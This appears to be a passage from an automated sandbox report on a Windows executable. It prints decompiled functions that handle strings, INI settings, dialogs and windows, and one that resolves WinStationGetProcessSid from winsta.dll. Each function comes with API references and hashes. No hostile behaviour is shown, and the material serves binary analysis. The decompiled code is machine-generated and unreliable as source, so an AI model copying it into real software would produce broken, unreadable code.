Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamememsetwcscatwcsrchr
String ID: .cfg
API String ID: 776488737-3410578098
Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C

Uniqueness

Uniqueness Score: -1.00%

Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}

0x00407e2d
0x00407e46
0x00407e48
0x00407e4d
0x00407e5f
0x00407e6b
0x00407e6f
0x00407e75
0x00407e7c
0x00407e7d
0x00407e88
0x00407e8d
0x00407e8e
0x00407eaa

APIs

memset.MSVCRT ref: 00407E48
memset.MSVCRT ref: 00407E5F

Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288

_snwprintf.MSVCRT ref: 00407E8E

Strings

</%s>, xrefs: 00407E7D

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf_wcslwrwcscpy
String ID: </%s>
API String ID: 3400436232-259020660
Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}

APIs

memset.MSVCRT ref: 00405E44
SetWindowTextW.USER32(?,?), ref: 00405E74
EnumChildWindows.USER32 ref: 00405E84

Strings

caption, xrefs: 00405E59

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ChildEnumTextWindowWindowsmemset
String ID: caption
API String ID: 1523050162-4135340389
Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC

Uniqueness

Uniqueness Score: -1.00%

Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}

0x00409a4a
0x00409a4f
0x00409a56
0x00409a5e
0x00409a60
0x00409a6e
0x00409a6e
0x00409a60
0x00409a71
0x00409a76
0x00000000
0x00409a78
0x00000000
0x00409a89

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68

Strings

WinStationGetProcessSid, xrefs: 00409A62
winsta.dll, xrefs: 00409A51
Y@, xrefs: 00409A46

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AddressProcmemsetwcscat
String ID: WinStationGetProcessSid$winsta.dll$Y@
API String ID: 946536540-379566740
Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}

APIs

??2@YAPAXI@Z.MSVCRT ref: 004058C3
memset.MSVCRT ref: 004058D4
memcpy.MSVCRT ref: 004058E0
??3@YAXPAX@Z.MSVCRT ref: 004058ED

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20);
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}

APIs

memset.MSVCRT ref: 00409E08

Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184

WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
memset.MSVCRT ref: 00409E3B
GetPrivateProfileStringW.KERNEL32 ref: 00409E5D

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
String ID:
API String ID: 1127616056-0
Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}

APIs

SHGetMalloc.SHELL32(?), ref: 0040AD0C
SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
wcscpy.MSVCRT ref: 0040AD65

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: BrowseFolderFromListMallocPathwcscpy
String ID:
API String ID: 3917621476-0
Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}

APIs

GetDlgItem.USER32 ref: 00404A52
SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item
String ID:
API String ID: 3888421826-0
Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64

Uniqueness

Uniqueness Score: -1.00%

Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41
filestringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}

0x004072e0
0x004072f7
0x004072fd
0x00407316
0x00407342

APIs

memset.MSVCRT ref: 004072FD
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
strlen.MSVCRT ref: 00407328
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}

0x00408dd0
0x00408dd2
0x00408de2
0x00408df4
0x00408e01
0x00408e1b
0x00408e21
0x00408e28
0x00408e30
0x00408dd4
0x00408dd8
0x00408dd8

APIs

memcpy.MSVCRT ref: 00408DE2
memcpy.MSVCRT ref: 00408DF4
GetModuleHandleW.KERNEL32(00000000), ref: 00408E07
DialogBoxParamW.USER32 ref: 00408E1B

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$DialogHandleModuleParam
String ID:
API String ID: 1386444988-0
Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC

Uniqueness

Uniqueness Score: -1.00%

Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}

0x004050e1
0x004050ec
0x004050ee
0x004050f5
0x004050ff
0x00405114
0x00405118
0x00405123
0x00405128
0x00405101
0x00405109
0x0040510f
0x0040512e

APIs

wcslen.MSVCRT ref: 004050E3
wcslen.MSVCRT ref: 004050EE
wcscat.MSVCRT ref: 00405109
wcsncat.MSVCRT ref: 00405123

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcslen$wcscatwcsncat
String ID:
API String ID: 291873006-0
Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD

Uniqueness

Uniqueness Score: -1.00%

Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}

0x00402de0
0x00402de2
0x00402dec
0x00402def
0x00402dfb
0x00402e0c
0x00402e0e
0x00402e0e
0x00402e16
0x00402e18
0x00402e1a
0x00402e21

APIs

GetClientRect.USER32 ref: 00402DEF
GetWindow.USER32(?,00000005), ref: 00402E07
GetWindow.USER32(00000000), ref: 00402E0A

Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3

GetWindow.USER32(00000000,00000002), ref: 00402E16

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientPoints
String ID:
API String ID: 4235085887-0
Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040B6B0
??3@YAXPAX@Z.MSVCRT ref: 0040B6C0
??3@YAXPAX@Z.MSVCRT ref: 0040B6D0
??3@YAXPAX@Z.MSVCRT ref: 0040B6E0

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED

Uniqueness

Uniqueness Score: -1.00%

Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
